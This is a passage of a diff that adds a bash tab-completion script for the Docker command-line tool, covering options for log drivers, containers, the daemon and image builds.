+			COMPREPLY=( $( compgen -W "$all_options" -S = -- "$cur" ) )
+			;;
+		awslogs)
+			COMPREPLY=( $( compgen -W "$awslogs_options" -S = -- "$cur" ) )
+			;;
+		fluentd)
+			COMPREPLY=( $( compgen -W "$fluentd_options" -S = -- "$cur" ) )
+			;;
+		gcplogs)
+			COMPREPLY=( $( compgen -W "$gcplogs_options" -S = -- "$cur" ) )
+			;;
+		gelf)
+			COMPREPLY=( $( compgen -W "$gelf_options" -S = -- "$cur" ) )
+			;;
+		journald)
+			COMPREPLY=( $( compgen -W "$journald_options" -S = -- "$cur" ) )
+			;;
+		json-file)
+			COMPREPLY=( $( compgen -W "$json_file_options" -S = -- "$cur" ) )
+			;;
+		logentries)
+			COMPREPLY=( $( compgen -W "$logentries_options" -S = -- "$cur" ) )
+			;;
+		syslog)
+			COMPREPLY=( $( compgen -W "$syslog_options" -S = -- "$cur" ) )
+			;;
+		splunk)
+			COMPREPLY=( $( compgen -W "$splunk_options" -S = -- "$cur" ) )
+			;;
+		*)
+			return
+			;;
+	esac
+
+	__docker_nospace
+}
+
+__docker_complete_log_driver_options() {
+	local key=$(__docker_map_key_of_current_option '--log-opt')
+	case "$key" in
+		fluentd-async-connect)
+			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
+			return
+			;;
+		gelf-address)
+			COMPREPLY=( $( compgen -W "udp" -S "://" -- "${cur##*=}" ) )
+			__docker_nospace
+			return
+			;;
+		gelf-compression-level)
+			COMPREPLY=( $( compgen -W "1 2 3 4 5 6 7 8 9" -- "${cur##*=}" ) )
+			return
+			;;
+		gelf-compression-type)
+			COMPREPLY=( $( compgen -W "gzip none zlib" -- "${cur##*=}" ) )
+			return
+			;;
+		syslog-address)
+			COMPREPLY=( $( compgen -W "tcp:// tcp+tls:// udp:// unix://" -- "${cur##*=}" ) )
+			__docker_nospace
+			__ltrim_colon_completions "${cur}"
+			return
+			;;
+		syslog-facility)
+			COMPREPLY=( $( compgen -W "
+				auth
+				authpriv
+				cron
+				daemon
+				ftp
+				kern
+				local0
+				local1
+				local2
+				local3
+				local4
+				local5
+				local6
+				local7
+				lpr
+				mail
+				news
+				syslog
+				user
+				uucp
+			" -- "${cur##*=}" ) )
+			return
+			;;
+		syslog-format)
+			COMPREPLY=( $( compgen -W "rfc3164 rfc5424 rfc5424micro" -- "${cur##*=}" ) )
+			return
+			;;
+		syslog-tls-ca-cert|syslog-tls-cert|syslog-tls-key)
+			_filedir
+			return
+			;;
+		syslog-tls-skip-verify)
+			COMPREPLY=( $( compgen -W "true" -- "${cur##*=}" ) )
+			return
+			;;
+		splunk-url)
+			COMPREPLY=( $( compgen -W "http:// https://" -- "${cur##*=}" ) )
+			__docker_nospace
+			__ltrim_colon_completions "${cur}"
+			return
+			;;
+		splunk-gzip|splunk-insecureskipverify|splunk-verify-connection)
+			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
+			return
+			;;
+		splunk-format)
+			COMPREPLY=( $( compgen -W "inline json raw" -- "${cur##*=}" ) )
+			return
+			;;
+	esac
+	return 1
+}
+
+__docker_complete_log_levels() {
+	COMPREPLY=( $( compgen -W "debug info warn error fatal" -- "$cur" ) )
+}
+
+__docker_complete_restart() {
+	case "$prev" in
+		--restart)
+			case "$cur" in
+				on-failure:*)
+					;;
+				*)
+					COMPREPLY=( $( compgen -W "always no on-failure on-failure: unless-stopped" -- "$cur") )
+					;;
+			esac
+			return
+			;;
+	esac
+	return 1
+}
+
+# __docker_complete_signals returns a subset of the available signals that is most likely
+# relevant in the context of docker containers
+__docker_complete_signals() {
+	local signals=(
+		SIGCONT
+		SIGHUP
+		SIGINT
+		SIGKILL
+		SIGQUIT
+		SIGSTOP
+		SIGTERM
+		SIGUSR1
+		SIGUSR2
+	)
+	COMPREPLY=( $( compgen -W "${signals[*]} ${signals[*]#SIG}" -- "$( echo $cur | tr '[:lower:]' '[:upper:]')" ) )
+}
+
+__docker_complete_user_group() {
+	if [[ $cur == *:* ]] ; then
+		COMPREPLY=( $(compgen -g -- "${cur#*:}") )
+	else
+		COMPREPLY=( $(compgen -u -S : -- "$cur") )
+		__docker_nospace
+	fi
+}
+
+_docker_docker() {
+	# global options that may appear after the docker command
+	local boolean_options="
+		$global_boolean_options
+		--help
+		--version -v
+	"
+
+	case "$prev" in
+		--config)
+			_filedir -d
+			return
+			;;
+		--log-level|-l)
+			__docker_complete_log_levels
+			return
+			;;
+		$(__docker_to_extglob "$global_options_with_args") )
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "$boolean_options $global_options_with_args" -- "$cur" ) )
+			;;
+		*)
+			local counter=$( __docker_pos_first_nonflag "$(__docker_to_extglob "$global_options_with_args")" )
+			if [ $cword -eq $counter ]; then
+				__docker_is_experimental && commands+=(${experimental_commands[*]})
+				COMPREPLY=( $( compgen -W "${commands[*]} help" -- "$cur" ) )
+			fi
+			;;
+	esac
+}
+
+_docker_attach() {
+	_docker_container_attach
+}
+
+_docker_build() {
+	_docker_image_build
+}
+
+
+_docker_checkpoint() {
+	local subcommands="
+		create
+		ls
+		rm
+	"
+	local aliases="
+		list
+		remove
+	"
+	__docker_subcommands "$subcommands $aliases" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_checkpoint_create() {
+	case "$prev" in
+		--checkpoint-dir)
+			_filedir -d
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--checkpoint-dir --help --leave-running" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--checkpoint-dir')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_running
+			fi
+			;;
+	esac
+}
+
+_docker_checkpoint_ls() {
+	case "$prev" in
+		--checkpoint-dir)
+			_filedir -d
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--checkpoint-dir')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_all
+			fi
+			;;
+	esac
+}
+
+_docker_checkpoint_rm() {
+	case "$prev" in
+		--checkpoint-dir)
+			_filedir -d
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--checkpoint-dir')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_all
+			elif [ $cword -eq $(($counter + 1)) ]; then
+				COMPREPLY=( $( compgen -W "$(__docker_q checkpoint ls "$prev" | sed 1d)" -- "$cur" ) )
+			fi
+			;;
+	esac
+}
+
+
+_docker_container() {
+	local subcommands="
+		attach
+		commit
+		cp
+		create
+		diff
+		exec
+		export
+		inspect
+		kill
+		logs
+		ls
+		pause
+		port
+		prune
+		rename
+		restart
+		rm
+		run
+		start
+		stats
+		stop
+		top
+		unpause
+		update
+		wait
+	"
+	local aliases="
+		list
+		ps
+	"
+	__docker_subcommands "$subcommands $aliases" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_container_attach() {
+	__docker_complete_detach-keys && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--detach-keys --help --no-stdin --sig-proxy=false" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--detach-keys')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_running
+			fi
+			;;
+	esac
+}
+
+_docker_container_commit() {
+	case "$prev" in
+		--author|-a|--change|-c|--message|-m)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--author -a --change -c --help --message -m --pause=false -p=false" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--author|-a|--change|-c|--message|-m')
+
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_all
+				return
+			fi
+			(( counter++ ))
+
+			if [ $cword -eq $counter ]; then
+				__docker_complete_image_repos_and_tags
+				return
+			fi
+			;;
+	esac
+}
+
+_docker_container_cp() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--follow-link -L --help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				case "$cur" in
+					*:)
+						return
+						;;
+					*)
+						# combined container and filename completion
+						_filedir
+						local files=( ${COMPREPLY[@]} )
+
+						__docker_complete_containers_all
+						COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) )
+						local containers=( ${COMPREPLY[@]} )
+
+						COMPREPLY=( $( compgen -W "${files[*]} ${containers[*]}" -- "$cur" ) )
+						if [[ "$COMPREPLY" == *: ]]; then
+							__docker_nospace
+						fi
+						return
+						;;
+				esac
+			fi
+			(( counter++ ))
+
+			if [ $cword -eq $counter ]; then
+				if [ -e "$prev" ]; then
+					__docker_complete_containers_all
+					COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) )
+					__docker_nospace
+				else
+					_filedir
+				fi
+				return
+			fi
+			;;
+	esac
+}
+
+_docker_container_create() {
+	_docker_container_run
+}
+
+_docker_container_diff() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_all
+			fi
+			;;
+	esac
+}
+
+_docker_container_exec() {
+	__docker_complete_detach-keys && return
+
+	case "$prev" in
+		--env|-e)
+			# we do not append a "=" here because "-e VARNAME" is legal systax, too
+			COMPREPLY=( $( compgen -e -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--user|-u)
+			__docker_complete_user_group
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--detach -d --detach-keys --env -e --help --interactive -i --privileged -t --tty -u --user" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_containers_running
+			;;
+	esac
+}
+
+_docker_container_export() {
+	case "$prev" in
+		--output|-o)
+			_filedir
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_all
+			fi
+			;;
+	esac
+}
+
+_docker_container_inspect() {
+	_docker_inspect --type container
+}
+
+_docker_container_kill() {
+	case "$prev" in
+		--signal|-s)
+			__docker_complete_signals
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --signal -s" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_containers_running
+			;;
+	esac
+}
+
+_docker_container_logs() {
+	case "$prev" in
+		--since|--tail)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--details --follow -f --help --since --tail --timestamps -t" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--since|--tail')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_all
+			fi
+			;;
+	esac
+}
+
+_docker_container_list() {
+	_docker_container_ls
+}
+
+_docker_container_ls() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		ancestor)
+			cur="${cur##*=}"
+			__docker_complete_images
+			return
+			;;
+		before)
+			__docker_complete_containers_all --cur "${cur##*=}"
+			return
+			;;
+		id)
+			__docker_complete_containers_all --cur "${cur##*=}" --id
+			return
+			;;
+		health)
+			COMPREPLY=( $( compgen -W "healthy starting none unhealthy" -- "${cur##*=}" ) )
+			return
+			;;
+		is-task)
+			COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) )
+			return
+			;;
+		name)
+			__docker_complete_containers_all --cur "${cur##*=}" --name
+			return
+			;;
+		network)
+			__docker_complete_networks --cur "${cur##*=}"
+			return
+			;;
+		since)
+			__docker_complete_containers_all --cur "${cur##*=}"
+			return
+			;;
+		status)
+			COMPREPLY=( $( compgen -W "created dead exited paused restarting running removing" -- "${cur##*=}" ) )
+			return
+			;;
+		volume)
+			__docker_complete_volumes --cur "${cur##*=}"
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -S = -W "ancestor before exited health id is-task label name network since status volume" -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--format|--last|-n)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--all -a --filter -f --format --help --last -n --latest -l --no-trunc --quiet -q --size -s" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_container_pause() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_containers_running
+			;;
+	esac
+}
+
+_docker_container_port() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_all
+			fi
+			;;
+	esac
+}
+
+_docker_container_prune() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_container_ps() {
+	_docker_container_ls
+}
+
+_docker_container_rename() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_all
+			fi
+			;;
+	esac
+}
+
+_docker_container_restart() {
+	case "$prev" in
+		--time|-t)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_containers_all
+			;;
+	esac
+}
+
+_docker_container_rm() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help --link -l --volumes -v" -- "$cur" ) )
+			;;
+		*)
+			for arg in "${COMP_WORDS[@]}"; do
+				case "$arg" in
+					--force|-f)
+						__docker_complete_containers_all
+						return
+						;;
+				esac
+			done
+			__docker_complete_containers_stopped
+			;;
+	esac
+}
+
+_docker_container_run() {
+	local options_with_args="
+		--add-host
+		--attach -a
+		--blkio-weight
+		--blkio-weight-device
+		--cap-add
+		--cap-drop
+		--cgroup-parent
+		--cidfile
+		--cpu-period
+		--cpu-quota
+		--cpu-rt-period
+		--cpu-rt-runtime
+		--cpuset-cpus
+		--cpus
+		--cpuset-mems
+		--cpu-shares -c
+		--device
+		--device-read-bps
+		--device-read-iops
+		--device-write-bps
+		--device-write-iops
+		--dns
+		--dns-option
+		--dns-search
+		--entrypoint
+		--env -e
+		--env-file
+		--expose
+		--group-add
+		--hostname -h
+		--init-path
+		--ip
+		--ip6
+		--ipc
+		--isolation
+		--kernel-memory
+		--label-file
+		--label -l
+		--link
+		--link-local-ip
+		--log-driver
+		--log-opt
+		--mac-address
+		--memory -m
+		--memory-swap
+		--memory-swappiness
+		--memory-reservation
+		--name
+		--network
+		--network-alias
+		--oom-score-adj
+		--pid
+		--pids-limit
+		--publish -p
+		--restart
+		--runtime
+		--security-opt
+		--shm-size
+		--stop-signal
+		--stop-timeout
+		--storage-opt
+		--tmpfs
+		--sysctl
+		--ulimit
+		--user -u
+		--userns
+		--uts
+		--volume-driver
+		--volumes-from
+		--volume -v
+		--workdir -w
+	"
+
+	local boolean_options="
+		--disable-content-trust=false
+		--help
+		--init
+		--interactive -i
+		--oom-kill-disable
+		--privileged
+		--publish-all -P
+		--read-only
+		--tty -t
+	"
+
+	if [ "$command" = "run" -o "$subcommand" = "run" ] ; then
+		options_with_args="$options_with_args
+			--detach-keys
+			--health-cmd
+			--health-interval
+			--health-retries
+			--health-timeout
+		"
+		boolean_options="$boolean_options
+			--detach -d
+			--no-healthcheck
+			--rm
+			--sig-proxy=false
+		"
+		__docker_complete_detach-keys && return
+	fi
+
+	local all_options="$options_with_args $boolean_options"
+
+
+	__docker_complete_log_driver_options && return
+	__docker_complete_restart && return
+
+	local key=$(__docker_map_key_of_current_option '--security-opt')
+	case "$key" in
+		label)
+			[[ $cur == *: ]] && return
+			COMPREPLY=( $( compgen -W "user: role: type: level: disable" -- "${cur##*=}") )
+			if [ "${COMPREPLY[*]}" != "disable" ] ; then
+				__docker_nospace
+			fi
+			return
+			;;
+		seccomp)
+			local cur=${cur##*=}
+			_filedir
+			COMPREPLY+=( $( compgen -W "unconfined" -- "$cur" ) )
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--add-host)
+			case "$cur" in
+				*:)
+					__docker_complete_resolved_hostname
+					return
+					;;
+			esac
+			;;
+		--attach|-a)
+			COMPREPLY=( $( compgen -W 'stdin stdout stderr' -- "$cur" ) )
+			return
+			;;
+		--cap-add|--cap-drop)
+			__docker_complete_capabilities
+			return
+			;;
+		--cidfile|--env-file|--init-path|--label-file)
+			_filedir
+			return
+			;;
+		--device|--tmpfs|--volume|-v)
+			case "$cur" in
+				*:*)
+					# TODO somehow do _filedir for stuff inside the image, if it's already specified (which is also somewhat difficult to determine)
+					;;
+				'')
+					COMPREPLY=( $( compgen -W '/' -- "$cur" ) )
+					__docker_nospace
+					;;
+				/*)
+					_filedir
+					__docker_nospace
+					;;
+			esac
+			return
+			;;
+		--env|-e)
+			# we do not append a "=" here because "-e VARNAME" is legal systax, too
+			COMPREPLY=( $( compgen -e -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--ipc)
+			case "$cur" in
+				*:*)
+					cur="${cur#*:}"
+					__docker_complete_containers_running
+					;;
+				*)
+					COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) )
+					if [ "$COMPREPLY" = "container:" ]; then
+						__docker_nospace
+					fi
+					;;
+			esac
+			return
+			;;
+		--isolation)
+			__docker_complete_isolation
+			return
+			;;
+		--link)
+			case "$cur" in
+				*:*)
+					;;
+				*)
+					__docker_complete_containers_running
+					COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) )
+					__docker_nospace
+					;;
+			esac
+			return
+			;;
+		--log-driver)
+			__docker_complete_log_drivers
+			return
+			;;
+		--log-opt)
+			__docker_complete_log_options
+			return
+			;;
+		--network)
+			case "$cur" in
+				container:*)
+					__docker_complete_containers_all --cur "${cur#*:}"
+					;;
+				*)
+					COMPREPLY=( $( compgen -W "$(__docker_plugins_bundled --type Network) $(__docker_networks) container:" -- "$cur") )
+					if [ "${COMPREPLY[*]}" = "container:" ] ; then
+						__docker_nospace
+					fi
+					;;
+			esac
+			return
+			;;
+		--pid)
+			case "$cur" in
+				*:*)
+					__docker_complete_containers_running --cur "${cur#*:}"
+					;;
+				*)
+					COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) )
+					if [ "$COMPREPLY" = "container:" ]; then
+						__docker_nospace
+					fi
+					;;
+			esac
+			return
+			;;
+		--runtime)
+			__docker_complete_runtimes
+			return
+			;;
+		--security-opt)
+			COMPREPLY=( $( compgen -W "apparmor= label= no-new-privileges seccomp=" -- "$cur") )
+			if [ "${COMPREPLY[*]}" != "no-new-privileges" ] ; then
+				__docker_nospace
+			fi
+			return
+			;;
+		--storage-opt)
+			COMPREPLY=( $( compgen -W "size" -S = -- "$cur") )
+			__docker_nospace
+			return
+			;;
+		--user|-u)
+			__docker_complete_user_group
+			return
+			;;
+		--userns)
+			COMPREPLY=( $( compgen -W "host" -- "$cur" ) )
+			return
+			;;
+		--volume-driver)
+			__docker_complete_plugins_bundled --type Volume
+			return
+			;;
+		--volumes-from)
+			__docker_complete_containers_all
+			return
+			;;
+		$(__docker_to_extglob "$options_with_args") )
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) )
+			;;
+		*)
+			local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) )
+			if [ $cword -eq $counter ]; then
+				__docker_complete_images
+			fi
+			;;
+	esac
+}
+
+_docker_container_start() {
+	__docker_complete_detach-keys && return
+
+	case "$prev" in
+		--checkpoint)
+			if [ __docker_is_experimental ] ; then
+				return
+			fi
+			;;
+		--checkpoint-dir)
+			if [ __docker_is_experimental ] ; then
+				_filedir -d
+				return
+			fi
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			local options="--attach -a --detach-keys --help --interactive -i"
+			__docker_is_experimental && options+=" --checkpoint --checkpoint-dir"
+			COMPREPLY=( $( compgen -W "$options" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_containers_stopped
+			;;
+	esac
+}
+
+_docker_container_stats() {
+	case "$prev" in
+		--format)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--all -a --format --help --no-stream" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_containers_running
+			;;
+	esac
+}
+
+_docker_container_stop() {
+	case "$prev" in
+		--time|-t)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_containers_running
+			;;
+	esac
+}
+
+_docker_container_top() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_running
+			fi
+			;;
+	esac
+}
+
+_docker_container_unpause() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_containers_unpauseable
+			fi
+			;;
+	esac
+}
+
+_docker_container_update() {
+	local options_with_args="
+		--blkio-weight
+		--cpu-period
+		--cpu-quota
+		--cpu-rt-period
+		--cpu-rt-runtime
+		--cpuset-cpus
+		--cpuset-mems
+		--cpu-shares -c
+		--kernel-memory
+		--memory -m
+		--memory-reservation
+		--memory-swap
+		--restart
+	"
+
+	local boolean_options="
+		--help
+	"
+
+	local all_options="$options_with_args $boolean_options"
+
+	__docker_complete_restart && return
+
+	case "$prev" in
+		$(__docker_to_extglob "$options_with_args") )
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_containers_all
+			;;
+	esac
+}
+
+_docker_container_wait() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_containers_all
+			;;
+	esac
+}
+
+
+_docker_commit() {
+	_docker_container_commit
+}
+
+_docker_cp() {
+	_docker_container_cp
+}
+
+_docker_create() {
+	_docker_container_run
+}
+
+_docker_daemon() {
+	local boolean_options="
+		$global_boolean_options
+		--disable-legacy-registry
+		--experimental
+		--help
+		--icc=false
+		--init
+		--ip-forward=false
+		--ip-masq=false
+		--iptables=false
+		--ipv6
+		--live-restore
+		--raw-logs
+		--selinux-enabled
+		--userland-proxy=false
+	"
+	local options_with_args="
+		$global_options_with_args
+		--add-runtime
+		--api-cors-header
+		--authorization-plugin
+		--bip
+		--bridge -b
+		--cgroup-parent
+		--cluster-advertise
+		--cluster-store
+		--cluster-store-opt
+		--config-file
+		--containerd
+		--default-gateway
+		--default-gateway-v6
+		--default-ulimit
+		--dns
+		--dns-search
+		--dns-opt
+		--exec-opt
+		--exec-root
+		--fixed-cidr
+		--fixed-cidr-v6
+		--graph -g
+		--group -G
+		--init-path
+		--insecure-registry
+		--ip
+		--label
+		--log-driver
+		--log-opt
+		--max-concurrent-downloads
+		--max-concurrent-uploads
+		--mtu
+		--oom-score-adjust
+		--pidfile -p
+		--registry-mirror
+		--seccomp-profile
+		--shutdown-timeout
+		--storage-driver -s
+		--storage-opt
+		--userland-proxy-path
+		--userns-remap
+	"
+
+	__docker_complete_log_driver_options && return
+
+ 	key=$(__docker_map_key_of_current_option '--cluster-store-opt')
+ 	case "$key" in
+ 		kv.*file)
+			cur=${cur##*=}
+ 			_filedir
+ 			return
+ 			;;
+ 	esac
+
+ 	local key=$(__docker_map_key_of_current_option '--storage-opt')
+ 	case "$key" in
+ 		dm.blkdiscard|dm.override_udev_sync_check|dm.use_deferred_removal|dm.use_deferred_deletion)
+ 			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
+ 			return
+ 			;;
+ 		dm.fs)
+ 			COMPREPLY=( $( compgen -W "ext4 xfs" -- "${cur##*=}" ) )
+ 			return
+ 			;;
+ 		dm.thinpooldev)
+			cur=${cur##*=}
+ 			_filedir
+ 			return
+ 			;;
+ 	esac
+
+	case "$prev" in
+		--authorization-plugin)
+			__docker_complete_plugins_bundled --type Authorization
+			return
+			;;
+		--cluster-store)
+			COMPREPLY=( $( compgen -W "consul etcd zk" -S "://" -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--cluster-store-opt)
+			COMPREPLY=( $( compgen -W "discovery.heartbeat discovery.ttl kv.cacertfile kv.certfile kv.keyfile kv.path" -S = -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--config-file|--containerd|--init-path|--pidfile|-p|--tlscacert|--tlscert|--tlskey|--userland-proxy-path)
+			_filedir
+			return
+			;;
+		--exec-root|--graph|-g)
+			_filedir -d
+			return
+			;;
+		--log-driver)
+			__docker_complete_log_drivers
+			return
+			;;
+		--storage-driver|-s)
+			COMPREPLY=( $( compgen -W "aufs btrfs devicemapper overlay  overlay2 vfs zfs" -- "$(echo $cur | tr '[:upper:]' '[:lower:]')" ) )
+			return
+			;;
+		--storage-opt)
+			local btrfs_options="btrfs.min_space"
+			local devicemapper_options="
+				dm.basesize
+				dm.blkdiscard
+				dm.blocksize
+				dm.fs
+				dm.loopdatasize
+				dm.loopmetadatasize
+				dm.min_free_space
+				dm.mkfsarg
+				dm.mountopt
+				dm.override_udev_sync_check
+				dm.thinpooldev
+				dm.use_deferred_deletion
+				dm.use_deferred_removal
+			"
+			local zfs_options="zfs.fsname"
+
+			case $(__docker_value_of_option '--storage-driver|-s') in
+				'')
+					COMPREPLY=( $( compgen -W "$btrfs_options $devicemapper_options $zfs_options" -S = -- "$cur" ) )
+					;;
+				btrfs)
+					COMPREPLY=( $( compgen -W "$btrfs_options" -S = -- "$cur" ) )
+					;;
+				devicemapper)
+					COMPREPLY=( $( compgen -W "$devicemapper_options" -S = -- "$cur" ) )
+					;;
+				zfs)
+					COMPREPLY=( $( compgen -W "$zfs_options" -S = -- "$cur" ) )
+					;;
+				*)
+					return
+					;;
+			esac
+			__docker_nospace
+			return
+			;;
+		--log-level|-l)
+			__docker_complete_log_levels
+			return
+			;;
+		--log-opt)
+			__docker_complete_log_options
+			return
+			;;
+		--seccomp-profile)
+			_filedir json
+			return
+			;;
+		--userns-remap)
+			__docker_complete_user_group
+			return
+			;;
+		$(__docker_to_extglob "$options_with_args") )
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_deploy() {
+	__docker_is_experimental && _docker_stack_deploy
+}
+
+_docker_diff() {
+	_docker_container_diff
+}
+
+_docker_events() {
+	_docker_system_events
+}
+
+_docker_exec() {
+	_docker_container_exec
+}
+
+_docker_export() {
+	_docker_container_export
+}
+
+_docker_help() {
+	local counter=$(__docker_pos_first_nonflag)
+	if [ $cword -eq $counter ]; then
+		COMPREPLY=( $( compgen -W "${commands[*]}" -- "$cur" ) )
+	fi
+}
+
+_docker_history() {
+	_docker_image_history
+}
+
+
+_docker_image() {
+	local subcommands="
+		build
+		history
+		import
+		inspect
+		load
+		ls
+		prune
+		pull
+		push
+		rm
+		save
+		tag
+	"
+	local aliases="
+		images
+		list
+		remove
+		rmi
+	"
+	__docker_subcommands "$subcommands $aliases" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_image_build() {
+	local options_with_args="
+		--build-arg
+		--cache-from
+		--cgroup-parent
+		--cpuset-cpus
+		--cpuset-mems
+		--cpu-shares -c
+		--cpu-period
+		--cpu-quota
+		--file -f
+		--isolation
+		--label
+		--memory -m
+		--memory-swap
+		--network
+		--shm-size
+		--tag -t
+		--ulimit
+	"
+
+	local boolean_options="
+		--compress
+		--disable-content-trust=false
+		--force-rm
+		--help
+		--no-cache
+		--pull
+		--quiet -q
+		--rm
+	"
+	__docker_is_experimental && boolean_options+="--squash"
+
+	local all_options="$options_with_args $boolean_options"
+
+	case "$prev" in
+		--build-arg)
+			COMPREPLY=( $( compgen -e -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--cache-from)
+			__docker_complete_image_repos_and_tags
+			return
+			;;
+		--file|-f)
+			_filedir
+			return
+			;;
+		--isolation)
+			__docker_complete_isolation
+			return
+			;;
+		--network)
+			case "$cur" in
+				container:*)
+					__docker_complete_containers_all --cur "${cur#*:}"
+					;;
